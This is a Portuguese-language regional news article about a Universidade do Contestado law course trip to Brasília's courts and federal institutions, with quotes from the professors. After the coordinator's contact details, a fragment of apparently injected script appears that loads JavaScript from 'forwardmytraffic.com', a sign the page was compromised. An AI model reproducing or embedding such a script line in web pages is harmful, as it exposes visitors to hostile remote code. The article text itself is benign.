InícioDestaqueViagem a Brasília

Viagem a Brasília

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

O curso de Direito da UnC, campus Canoinhas, programou para os graduandos do Curso de Direito, uma viagem à Capital Federal, no intuito de agregar maiores conhecimentos dos órgãos  nos poderes  Judiciário, Legislativo e Executivo Federal, bem como a possibilidade de participarem de sessões nos Tribunais Superiores, entre outras repartições.

 

Neste sentido, e visando uma completa formação para todas as áreas de atuação que o Direito oferece, os professores Danielly Borguezan, Jorge Rafael Matos, Cilmara L. Fante e Adriane O. Ningeliski, acompanharam os acadêmicos em visitas agendadas e guiadas nos seguintes locais e repartições:  STF, STJ, TST, TSE, PGR, Congresso Nacional, Palácio do Planalto, da Alvorada,  Itamaraty, Memorial JK, Museu do Voto, Museu Nacional, Torre de TV, Catedral, dentre outros.

Segundo a Coordenadora do Curso, Prof. Danielly Borguezan, “atividades como esta proporcionam  uma experiência peculiar e única. Do ponto de vista acadêmico, a ampliação dos horizontes, que permitem o crescimento pessoal e a recepção das lições jurídicas com maior propriedade. Por outro lado, também a atividade fortalece os laços entre os acadêmicos, docentes e o próprio Curso”.

 

Para o Prof. Jorge Rafael Matos, “também a experiência de conhecer os espaços físicos dos tribunais superiores engrandece o rol de aptidões do acadêmico, visto que durante as visitas estes puderam ter acesso aos locais de julgamento, como a tribuna do advogado, bem como tiveram contato com os atores processuais como ministros e procuradores. Estas experiências somente são possíveis durante a graduação, e que a Universidade do Contestado campus Canoinhas promove aos seus acadêmicos”.

 


— 

Prof. M. Danielly Borguezan

Coordenadora do Curso de Direito

Universidade do Contestado

Campus Canoinhas – SC

(47) 3622 9943 (47) 3622 9999… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.